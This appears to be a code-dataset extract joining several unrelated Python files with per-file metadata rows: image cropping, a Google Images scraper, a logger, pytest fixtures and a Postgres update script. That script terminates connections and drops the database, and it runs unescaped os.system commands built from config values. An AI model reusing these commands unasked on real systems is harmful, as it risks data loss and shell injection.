help="give this argument if you want to customize length of clocks/breaks, and aim clock count. You will enter a commandline interface.",
)
args = parser.parse_args()
# cache
db_path = utils.get_cache_filepath(args.db, debug=args.debug)
logging.info(f"{db_path} is where the db stored in.")
if args.debug:
db_file = f"{db_path}/ctimer_debug_2021.db"
db.create_connection(db_file) # create if not exist
else:
db_file = f"{db_path}/ctimer_2021.db"
db.create_connection(db_file) # create if not exist
if args.overall:
events = db.get_yearly_stats(db_file)
ss.plot_calmap(events=events)
elif args.stats:
ss.plot_timetable(path=db_file, outpath="/tmp/")
ss.quick_view_clocks(path=db_file, outpath="/tmp/")
else:
if args.cus:
cus_meta = utils.ask_customized()
ctimer.maintk(
db_file,
hide=args.hide,
debug=args.debug,
silence=args.silence,
meta=cus_meta,
)
else:
ctimer.maintk(
db_file, hide=args.hide, debug=args.debug, silence=args.silence
)
if __name__ == "__main__":
sys.exit(main())
| 31.690476 | 160 | 0.616454 | 344 | 2,662 | 4.610465 | 0.392442 | 0.034048 | 0.08575 | 0.066204 | 0.286255 | 0.261034 | 0.136192 | 0.136192 | 0.136192 | 0.136192 | 0 | 0.005708 | 0.276108 | 2,662 | 83 | 161 | 32.072289 | 0.817333 | 0.027423 | 0 | 0.253333 | 0 | 0.026667 | 0.300271 | 0.020922 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013333 | false | 0 | 0.093333 | 0 | 0.106667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37667d129be38ecf142b51cf7166051726ad367a | 5,256 | py | Python | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | ZoomImage.py | renshj/High-Cadence-Processing | 5d5a2df741858f6e1466d7c4b008e9245d4b780a | [
"MIT"
] | null | null | null | #This file was created by Wayne Dreyer
#It serves to create a zoomed/cropped image around the detected candidate
import matplotlib.pyplot as plt
from matplotlib.figure import Figure
from PIL import Image
import math
from ZoomObject import ZoomObject
#import DataObject as dataObject
#Takes in path to the image we wish to zoom, the x y coordinates of the candidate
#And a zoomfactor ie 2x would be to half the current dimensions of the image with candidate as close to center as possible
def zoomImage(dataObject):
imgList = []
zoomFactor = dataObject.getZoomFactor()
more = dataObject.getCandGt()
for i in range(len(more[0])):
candX, candY = (more[1][i], more[0][i])
result = createZoomed(candX, candY, dataObject.getZoomFactor(), dataObject)
imgList.append(ZoomObject(result[0], result[1], result[2], result[3], result[4], int(result[5]), int(result[6])))
less = dataObject.getCandLt()
for i in range(len(less[0])):
candX, candY = (less[1][i],less[0][i])
result = createZoomed(candX, candY, dataObject.getZoomFactor(), dataObject)
imgList.append(ZoomObject(result[0], result[1], result[2], result[3], result[4], int(result[5]), int(result[6])))
dataObject.setZoomedImages(imgList)
def checkPixels(dataObject):
xCoord = dataObject.getCheckX()
yCoord = dataObject.getCheckY()
zoomfactor = dataObject.getCheckFactor()
img, padTop, padBottom, padLeft, padRight, height, width = createZoomed(xCoord, yCoord, zoomfactor, dataObject)
dataObject.setPixelImage(img)
dataObject.setPadTop(padTop)
dataObject.setPadBottom(padBottom)
dataObject.setPadLeft(padLeft)
dataObject.setPadRight(padRight)
dataObject.setHeight(int(height))
dataObject.setWidth(int(width))
def createZoomed(xCoord, yCoord, zoomFactor, dataObject):
originalImage = dataObject.getImageData()
height = len(originalImage)
width = len(originalImage[0])
newWidth = width/zoomFactor
newHeight = height/zoomFactor
padLeft = 0
padRight = 0
padBottom = 0
padTop = 0
#Calculate new image width as range of original image
if((width - xCoord > newWidth/2) and (xCoord > newWidth/2)): #theres enough space to have candidate at center on x axis
left = math.floor(xCoord - newWidth/2)
right = math.floor(xCoord + newWidth/2)
elif(not(width - xCoord > newWidth/2)): # if there is not enough space to the right of candidate
right = width
left = math.floor(xCoord - newWidth/2)
padRight = newWidth - (right-left) #the difference between the calculated width and possible width = needed padding
elif(not(xCoord > newWidth/2)): #if there is not enough space to the left of the candidate
left = 0
right = math.floor(xCoord + newWidth/2)
padLeft = newWidth - (right-left) #the difference between the calculated width and possible width = needed padding
#calculate new image height as range of original image height
if((height - yCoord > newHeight/2) and (yCoord > newHeight/2)): #theres enough space to have candidate at center on y axis
bottom = math.floor(yCoord - newHeight/2)
top = math.floor(yCoord + newHeight/2)
elif(not(height - yCoord > newHeight/2)): # if there is not enough space to the bottom of candidate
top = height
bottom = math.floor(yCoord - newHeight/2)
padBottom = newHeight - (top-bottom) #the difference between the calculated height and possible height = needed padding
elif(not(yCoord > newHeight/2)): #if there is not enough space to the top of the candidate
bottom = 0
top = math.floor(yCoord + newHeight/2)
padTop = newHeight - (top-bottom) #the difference between the calculated height and possible height = needed padding
#the actual cropping
#croppedImage = originalImage.crop((left, bottom, right, top))
#plt.axis(left, right, bottom, top) ##This is how you crop a plot from matplotlib, however this doesn't actually crop the data just what is displayed
croppedImage = originalImage[bottom:top, left:right] # slicing/cropping the image array
return newFigure(croppedImage, 6500, 6700, ((len(croppedImage[0]) + padLeft + padRight)/2), ((len(croppedImage) + padTop + padBottom)/2), xCoord, yCoord), math.floor(padTop), math.floor(padBottom), math.floor(padLeft), math.floor(padRight), newWidth, newHeight
def newFigure(image, cmin, cmax, xLocation, yLocation, xCoord, yCoord):
#Create figure
newFig = plt.figure(figsize=(10,8))
#Set image data into figure
plt.imshow(image, clim=(cmin,cmax))
#Set axes and a colourbar
plt.xlabel("Pixel number")
plt.ylabel("Pixel number")
plt.colorbar()
#Annotate the figure
text=(xCoord,yCoord)
plt.plot(xLocation, yLocation, 'bo')
plt.annotate(text,(xLocation,yLocation), color='black', fontsize='large',fontweight='bold')
return newFig
def showImage(zoomedImage):
plt.imshow(zoomedImage)
def saveImage(filename, zoomedImage):
plt.imshow(zoomImage)
plt.savefig(filename)
| 46.105263 | 265 | 0.682839 | 664 | 5,256 | 5.40512 | 0.274096 | 0.030092 | 0.033436 | 0.025634 | 0.355531 | 0.31095 | 0.246308 | 0.246308 | 0.246308 | 0.246308 | 0 | 0.014081 | 0.216324 | 5,256 | 113 | 266 | 46.513274 | 0.857247 | 0.277017 | 0 | 0.15 | 0 | 0 | 0.010932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.0625 | 0 | 0.1625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37668c7ab8f618318b3325cde0c87efe87b84f7c | 2,032 | py | Python | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | service/dataset_builder.py | sumanthgenz/magma | 44a6c8b834fbf683c959ce336c6cdfe1df828980 | [
"MIT"
] | null | null | null | import pickle
import glob
import random
from tqdm import tqdm
import os
import collections
import urllib
import urllib.request
from urllib.request import Request, urlopen
import json
import shutil
class DatasetBuilder:
def __init__(self, name, data_type, classes, class_size):
self.name = name
self.data_type = data_type
self.classes = classes
self.class_size = class_size
def download_page(self, url):
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
return str(urllib.request.urlopen(req).read())
def fetch_google_images(self, query, image_limit=10):
search_url = 'https://www.google.com/search?q={}&tbm=isch'.format('+'.join(urllib.parse.quote(k) for k in query))
raw_html = self.download_page(search_url)
if raw_html is None:
return []
images = [img.replace("src=", "").split(';')[0][1:] for img in raw_html.split(" ") if "src=" in img and "https://" in img]
return images[:image_limit]
def get_text_vocab(self, prefix='train', pos='verb', topk=1000):
pass
def save_imgs(self, class_name, images):
dir = f'test_images/{class_name}'
if not os.path.exists(dir):
os.makedirs(dir)
for i, url in enumerate(images):
urllib.request.urlretrieve(url, f'{dir}/{i}.jpg')
def remove_folders(self, query):
pass
def get_data(self):
dataset = {}
for query in self.classes:
dataset[query] = self.fetch_google_images(query, self.class_size)
return dataset
if __name__ == "__main__":
queries = ["strawberry", "the green knight", "tyler the creator", "pizza", "zurich"]
builder = DatasetBuilder("movies", queries, 10)
dataset = builder.get_data()
for k in dataset:
builder.save_imgs(k, dataset[k])
| 30.787879 | 130 | 0.633858 | 275 | 2,032 | 4.530909 | 0.432727 | 0.052167 | 0.020867 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020739 | 0.24065 | 2,032 | 65 | 131 | 31.261538 | 0.786779 | 0 | 0 | 0.039216 | 0 | 0.019608 | 0.140748 | 0.011811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0.039216 | 0.215686 | 0 | 0.45098 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37682a93288511c01d92701ef4ba444acd620a71 | 391 | py | Python | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | app.py | flyme2bluemoon/Flask-Project-Template | 0a2953e4ec77ec577b13655856ab162efb536d4a | [
"MIT"
] | null | null | null | from helpers import *
from flask import Flask, redirect, request, render_template, session
from flask_session import Session
app = Flask(__name__)
app.config["TEMPLATES_AUTO_RELOAD"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
@app.route("/")
def index():
return "Hello"
if __name__ == "__main__":
app.run(host='0.0.0.0') | 23 | 68 | 0.7289 | 54 | 391 | 4.944444 | 0.555556 | 0.101124 | 0.11985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01173 | 0.127877 | 391 | 17 | 69 | 23 | 0.771261 | 0 | 0 | 0 | 0 | 0 | 0.206633 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3768f3ba1595d85981a62e468f1663abf36a9838 | 7,179 | py | Python | mmf/utils/logger.py | san2597/mmf | c0812e9281c6e679cb7f00af78a5eda267820aab | [
"BSD-3-Clause"
] | 2 | 2021-02-22T12:15:42.000Z | 2021-05-02T15:22:24.000Z | mmf/utils/logger.py | san2597/mmf | c0812e9281c6e679cb7f00af78a5eda267820aab | [
"BSD-3-Clause"
] | 7 | 2021-03-01T21:16:26.000Z | 2022-02-27T07:07:11.000Z | mmf/utils/logger.py | krantirk/MMF | 2e4acaad7ca8eee4319e1205a560eed81733a0be | [
"BSD-3-Clause"
] | 1 | 2022-03-04T14:19:43.000Z | 2022-03-04T14:19:43.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
import collections
import json
import logging
import os
import sys
from typing import Type
from mmf.utils.configuration import get_mmf_env
from mmf.utils.distributed import is_master
from mmf.utils.file_io import PathManager
from mmf.utils.timer import Timer
class Logger:
def __init__(self, config, name=None):
self._logger = None
self._is_master = is_master()
self.timer = Timer()
self.config = config
self.save_dir = get_mmf_env(key="save_dir")
self.log_format = config.training.log_format
self.time_format = "%Y-%m-%dT%H:%M:%S"
self.log_filename = "train_"
self.log_filename += self.timer.get_time_hhmmss(None, format=self.time_format)
self.log_filename += ".log"
self.log_folder = os.path.join(self.save_dir, "logs")
env_log_dir = get_mmf_env(key="log_dir")
if env_log_dir:
self.log_folder = env_log_dir
if not PathManager.exists(self.log_folder):
PathManager.mkdirs(self.log_folder)
self.log_filename = os.path.join(self.log_folder, self.log_filename)
if not self._is_master:
return
if self._is_master:
print("Logging to:", self.log_filename)
logging.captureWarnings(True)
if not name:
name = __name__
self._logger = logging.getLogger(name)
self._file_only_logger = logging.getLogger(name)
self._warnings_logger = logging.getLogger("py.warnings")
# Set level
level = config.training.logger_level
self._logger.setLevel(getattr(logging, level.upper()))
self._file_only_logger.setLevel(getattr(logging, level.upper()))
# Capture stdout to logger
self._stdout_logger = None
if self.config.training.stdout_capture:
self._stdout_logger = StreamToLogger(
logging.getLogger("stdout"), getattr(logging, level.upper())
)
sys.stdout = self._stdout_logger
formatter = logging.Formatter(
"%(asctime)s | %(levelname)s | %(name)s : %(message)s",
datefmt="%Y-%m-%dT%H:%M:%S",
)
# Add handler to file
channel = logging.FileHandler(filename=self.log_filename, mode="a")
channel.setFormatter(formatter)
self.add_handlers(channel)
# Add handler to train.log. train.log is full log that is also used
# by slurm/fbl output
channel = logging.FileHandler(
filename=os.path.join(self.save_dir, "train.log"), mode="a"
)
channel.setFormatter(formatter)
self.add_handlers(channel)
# Add handler to stdout. Only when we are not capturing stdout in
# the logger
if not self._stdout_logger:
channel = logging.StreamHandler(sys.stdout)
channel.setFormatter(formatter)
self._logger.addHandler(channel)
self._warnings_logger.addHandler(channel)
should_not_log = self.config.training.should_not_log
self.should_log = not should_not_log
# Single log wrapper map
self._single_log_map = set()
def add_handlers(self, channel: Type[logging.Handler]):
self._logger.addHandler(channel)
self._file_only_logger.addHandler(channel)
self._warnings_logger.addHandler(channel)
if self._stdout_logger:
self._stdout_logger.addHandler(channel)
def write(self, x, level="info", donot_print=False, log_all=False):
if self._logger is None:
return
if log_all is False and not self._is_master:
return
# if it should not log then just print it
if self.should_log:
if hasattr(self._logger, level):
if donot_print:
getattr(self._file_only_logger, level)(str(x))
else:
getattr(self._logger, level)(str(x))
else:
self._logger.error("Unknown log level type: %s" % level)
else:
print(str(x) + "\n")
def log_progress(self, info):
if not isinstance(info, collections.Mapping):
self.write(info)
if not self._is_master:
return
if self.log_format == "simple":
output = ", ".join([f"{key}: {value}" for key, value in info.items()])
elif self.log_format == "json":
output = json.dumps(info)
else:
output = str(info)
self.write(output)
def single_write(self, x, level="info", log_all=False):
if self._logger is None:
return
if log_all is False and not self._is_master:
return
if x + "_" + level in self._single_log_map:
return
else:
self.write(x, level)
class StreamToLogger:
"""
Adapted from <https://fburl.com/2qkv0wq2>
Fake file-like stream object that redirects writes to a logger instance.
"""
def __init__(self, logger: Type[logging.Logger], log_level: str = logging.INFO):
self._logger = logger
self.log_level = log_level
def addHandler(self, handler: Type[logging.Handler]):
self._logger.addHandler(handler)
def write(self, buf: str):
for line in buf.rstrip().splitlines():
self._logger.log(self.log_level, line.rstrip())
def flush(self):
pass
class TensorboardLogger:
def __init__(self, log_folder="./logs", iteration=0):
# This would handle warning of missing tensorboard
from torch.utils.tensorboard import SummaryWriter
self.summary_writer = None
self._is_master = is_master()
self.timer = Timer()
self.log_folder = log_folder
self.time_format = "%Y-%m-%dT%H:%M:%S"
if self._is_master:
current_time = self.timer.get_time_hhmmss(None, format=self.time_format)
tensorboard_folder = os.path.join(
self.log_folder, f"tensorboard_{current_time}"
)
self.summary_writer = SummaryWriter(tensorboard_folder)
def __del__(self):
if getattr(self, "summary_writer", None) is not None:
self.summary_writer.close()
def _should_log_tensorboard(self):
if self.summary_writer is None or not self._is_master:
return False
else:
return True
def add_scalar(self, key, value, iteration):
if not self._should_log_tensorboard():
return
self.summary_writer.add_scalar(key, value, iteration)
def add_scalars(self, scalar_dict, iteration):
if not self._should_log_tensorboard():
return
for key, val in scalar_dict.items():
self.summary_writer.add_scalar(key, val, iteration)
def add_histogram_for_model(self, model, iteration):
if not self._should_log_tensorboard():
return
for name, param in model.named_parameters():
np_param = param.clone().cpu().data.numpy()
self.summary_writer.add_histogram(name, np_param, iteration)
| 32.337838 | 86 | 0.620003 | 892 | 7,179 | 4.764574 | 0.206278 | 0.032941 | 0.025412 | 0.017647 | 0.326118 | 0.273882 | 0.192 | 0.192 | 0.140706 | 0.108706 | 0 | 0.000776 | 0.281794 | 7,179 | 221 | 87 | 32.484163 | 0.823507 | 0.068533 | 0 | 0.265823 | 0 | 0 | 0.042061 | 0.003906 | 0 | 0 | 0 | 0 | 0 | 1 | 0.094937 | false | 0.006329 | 0.06962 | 0 | 0.259494 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376ac08cf10241073ec03135469cc20f62b04104 | 1,710 | py | Python | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | mex.py | hagai-helman/mex | d4ee6f79dd0f96346a1b16727e5aa91ab808aed5 | [
"MIT"
] | null | null | null | class MexFinder:
"""This class collects non-negative integers, and finds the minimal
non-negative integer that was not added to it.
"""
def __init__(self):
# We maintain a dict, representing a set, with the following
# invariants:
# (a) Its keys are the elements of the set (and -1, see below);
# (b) For any maximal sequence of consecutive elements, the first
# one is mapped to last one, and vice-versa.
#
# The key (-1) is mapped to 0, so when an element is added, we
# don't need to give special treatment to the special case when
# this element is 0.
self._d = {-1: 0}
def add(self, n):
"""Adds a number to the collection.
`n` is assumed to be a non-negative integer.
"""
if n in self._d:
return
# We make sure `n` is in `self._d`.
self._d[n] = n
# We find the first element (`left`) and the last element (`right`) of
# the maximal sequence of consecutive elements that contains `n`.
left = self._d.get(n - 1, n)
right = self._d.get(n + 1, n)
# We make sure `left` and `right` are mapped to each other.
self._d[left] = right
self._d[right] = left
def mex(self):
"""Returns the minimal non-negative integer excluded from the set."""
if 0 not in self._d:
return 0
else:
return self._d[0] + 1
def mex(values):
"""Finds the minimal non-negative integer excluded from a given iterable
of non-negative integers."""
finder = MexFinder()
for value in values:
finder.add(value)
return finder.mex()
| 32.884615 | 78 | 0.580117 | 249 | 1,710 | 3.927711 | 0.37751 | 0.051125 | 0.07362 | 0.064417 | 0.216769 | 0.143149 | 0.0818 | 0 | 0 | 0 | 0 | 0.010408 | 0.325731 | 1,710 | 51 | 79 | 33.529412 | 0.837814 | 0.562573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376b687ba9788b6a0541074221d59f6f3f6f83f8 | 1,672 | py | Python | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | from collections import namedtuple
from pytest import fixture
from geocoder.geocoding import (
Addresses,
Coordinates,
)
@fixture
def mock_csv_coordinates(tmp_path):
data = [
"city,street,number,postal_code,state,lon,lat",
"Katowice,Armii Krajowej,102,40-671,istniejacy,259921.7313,498200.1764",
]
address = namedtuple('Address', data[0].split(','))
output = address(*data[1].split(','))
datafile = tmp_path / "coordinates.csv"
datafile.write_text("\n".join(data))
return str(datafile), output
@fixture
def mock_tuple_coordinates():
data = [
"city,street,number,postal_code,state,lon,lat",
"Katowice,Armii Krajowej,102,40-671,istniejacy,259921.7313,498200.1764",
"Katowice,Juliana Fałata,15,40-749,istniejacy,259301.2136,502763.3093",
"Katowice,Orlików,13,40-676,istniejacy,259152.4308,497821.8604",
]
address = namedtuple('Address', data[0].split(','))
return [address(*row.split(',')) for row in data[1:]]
@fixture
def mock_addresses():
csv_data = [
"city,street,number",
"Katowice,Armii Krajowej,102",
"Katowice,Jordana,20",
]
address = namedtuple('Address', csv_data[0].split(','))
return [address(*row.split(',')) for row in csv_data[1:]]
@fixture
def addr_instance(mock_addresses):
_, source_data = mock_addresses
instance = Addresses(source_data, street="street", number="number")
yield instance
@fixture
def coord_instance(mock_tuple_coordinates):
instance = Coordinates(mock_tuple_coordinates, street="street",
number="number", lat='lat', lon='lon')
yield instance
| 28.827586 | 80 | 0.668062 | 203 | 1,672 | 5.384236 | 0.359606 | 0.045746 | 0.038426 | 0.054895 | 0.307411 | 0.307411 | 0.254346 | 0.254346 | 0.254346 | 0.254346 | 0 | 0.088775 | 0.184809 | 1,672 | 57 | 81 | 29.333333 | 0.713133 | 0 | 0 | 0.326087 | 0 | 0 | 0.294856 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.065217 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376df6d7f89516a0e412a13d0db28bac87a6c75e | 7,176 | py | Python | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | null | null | null | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | 2 | 2021-06-04T11:42:27.000Z | 2021-06-04T16:16:21.000Z | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | 2 | 2021-04-16T09:00:04.000Z | 2021-06-23T12:07:45.000Z | import os
import json
import stat
from pathlib import Path
import sys
import urllib.parse
import uuid
import shutil
os.chdir(os.path.dirname(os.path.abspath(__file__)))
j = ''
with open('update_config.json') as f:
j = f.read()
j = json.loads(j)
branch_db = j["branch_db"]
branch_runtime = j["branch_runtime"]
branch_SciNLP = j["branch_SciNLP"]
branch_QAAutotests = j["branch_QAAutotests"]
db_URI = j["db_URI"]
parsed = urllib.parse.urlparse(db_URI)
db_URI = db_URI.replace(parsed.password, urllib.parse.quote(parsed.password))
db_user = parsed.username
db = db_URI.split('/')[-1]
ENVIRONMENT_NAME = j["ENVIRONMENT_NAME"]
LAMBDA_NAME = j["LAMBDA_NAME"]
LAMBDA_REGION = j["LAMBDA_REGION"]
run_object_create = j["run_object_create"]
version = j["version"]
quick_install = j["quick_install"]
downgrade_test = j["downgrade_test"]
if version == 'latest':
config_version = 999999999
else:
config_version = int(version)
def psql_str(cmd:str,DB_URI:str = db_URI)->str:
return f'psql -t -P pager=off {cmd} {DB_URI}'
#zero = 'fbcc09e9f4f5b03f0f952b95df8b481ec83b6685\n'
def json_schema_install(DB_URI=db_URI):
file_name = 'patched.sql'
rmdir('postgres-json-schema')
os.system(f'git clone https://github.com/gavinwahl/postgres-json-schema.git')
os.chdir('postgres-json-schema')
with open('postgres-json-schema--0.1.1.sql') as s, open(file_name,'w') as d:
d.write(s.read().replace('@extschema@','public').replace('CREATE OR REPLACE FUNCTION ','CREATE OR REPLACE FUNCTION public.'))
run_file(file_name,DB_URI)
os.chdir('..')
rmdir('postgres-json-schema')
def install_objects(l_name=LAMBDA_NAME, l_region=LAMBDA_REGION, e_name=ENVIRONMENT_NAME, DB_URI=db_URI):
file_name = 'object_create_patched.sql'
with open('object_create.sql') as f:
obj_cr = f.read()
obj_cr = obj_cr.replace('#@#lname#@#', l_name)
obj_cr = obj_cr.replace('#@#lregion#@#', l_region)
obj_cr = obj_cr.replace('#@#ename#@#', e_name)
with open(file_name,'w') as f:
f.write(obj_cr)
run_file(file_name,DB_URI)
os.remove(file_name)
def run_file(file_name,DB_URI=db_URI):
cmd = psql_str(f'-f "{file_name}"',DB_URI)
os.system(cmd)
def run_cmd_scalar(command,DB_URI=db_URI)->str:
cmd = psql_str(f'-c "{command}"',DB_URI)
return os.popen(cmd).read().strip()
def checkout(to:str = branch_db):
cmd = f'git checkout {to} -q'
#print(cmd)
r = os.popen(cmd).read()
return r
def rmdir(top:str):
if os.path.exists(top) and os.path.isdir(top):
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
filename = os.path.join(root, name)
os.chmod(filename, stat.S_IWUSR)
os.remove(filename)
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(top)
def clone_db():
rmdir('db')
os.chdir('..')
os.chdir('..')
folder_name = f'db_copy_{str(uuid.uuid4())}'
shutil.copytree('db',folder_name)
os.chdir(folder_name)
checkout('.')
os.chdir('..')
path = os.path.join('db','update','db')
shutil.move(folder_name, path)
os.chdir(path)
checkout(branch_db)
def get_commit_history(branch:str = branch_db, need_comment:bool = False):
checkout(branch)
res = os.popen(f'git log --pretty=format:"%H" --first-parent fbcc09e9f4f5b03f0f952b95df8b481ec83b6685..').readlines()
for i in range(len(res)):
res[i]=res[i].strip()
res.reverse()
if need_comment:
res2 = os.popen('git log --pretty=format:"%B" --first-parent fbcc09e9f4f5b03f0f952b95df8b481ec83b6685..').readlines()
while('\n' in res2):
res2.remove('\n')
for i in range(len(res2)):
s = res2[i]
res2[i] = s=s[s.find('(')+1:s.find(')')]
res2.reverse()
pre_valid_commit = 0
i = 0
remove_index = []
for commit in res[:]:
commit_v = get_version_from_commit(commit)
os.chdir('update')
# validate commit_v
if pre_valid_commit + 1 == commit_v:
pre_valid_commit +=1
else:
remove_index.append(i)
print(f'\tcommit: {commit} is invalid')
i+=1
os.chdir('..')
for i in reversed(remove_index):
del res[i]
if need_comment:
del res2[i]
if need_comment:
return res, res2
return res
def get_version_from_db(DB_URI=db_URI)->int:
return int(run_cmd_scalar("select max(ver) from dev.ver;",DB_URI))
def get_version_from_commit(commit = '', file_name = 'up_script.sql')->int:
if commit != '':
checkout(commit)
cd = Path('update').exists()
if cd:
os.chdir('update')
commit_v = -1
if not Path(file_name).exists():
return commit_v
with open(file_name, encoding='utf8') as f:
for line in f:
p = '-- version ='
if line.startswith(p):
commit_v = int(line.replace(p,''))
break
if cd:
os.chdir('..')
return commit_v
def recreate_db():
splt = db_URI.split('/')
splt[-1] = 'postgres'
db_URI_postgres = '/'.join(splt)
def execute(cmd:str):
os.system(psql_str(f'-c "{cmd}"', db_URI_postgres))
execute(f'''REVOKE CONNECT ON DATABASE {db} FROM PUBLIC, {db_user};''')
execute(f'''SELECT pg_terminate_backend(pid) '''
+ f''' FROM pg_stat_activity '''
+ f''' WHERE pid <> pg_backend_pid() '''
+ f''' AND datname = '{db}'; ''')
execute(f'''DROP DATABASE {db};''')
execute(f'''CREATE DATABASE {db};''')
def run_test():
rmdir('QAAutotests')
os.system(f'git clone https://github.com/reclada/QAAutotests')
os.chdir('QAAutotests')
os.system(f'git checkout {branch_QAAutotests}')
os.system(f'pip install -r requirements.txt')
os.system(f'pytest '
+ 'tests/components/security/test_database_sql_injections.py '
+ 'tests/components/database '
+ 'tests/components/postgrest '
+ '--alluredir results --log-file=test_output.log')
os.chdir('..')
rmdir('QAAutotests')
if __name__ == "__main__":
DB_URI = db_URI
if len(sys.argv) > 1:
DB_URI = sys.argv[1]
clone_db()
cur_ver_db = get_version_from_db(DB_URI)
print(f'current version database: {cur_ver_db}')
res = get_commit_history(branch_db)
#res = res[cur_ver:]
if len(res) == 0:
print('There is no updates')
else:
for commit in res:
commit_v = get_version_from_commit(commit)
os.chdir('update')
print(f'commit: {commit}\tcommit_version: {commit_v}')
if commit_v == cur_ver_db + 1:
print('\trun')
os.system('python create_up.sql.py')
run_file('up.sql',DB_URI)
cur_ver_db+=1
else:
print(f'\talready applied')
os.chdir('..')
if cur_ver_db == config_version:
break
os.chdir('..')
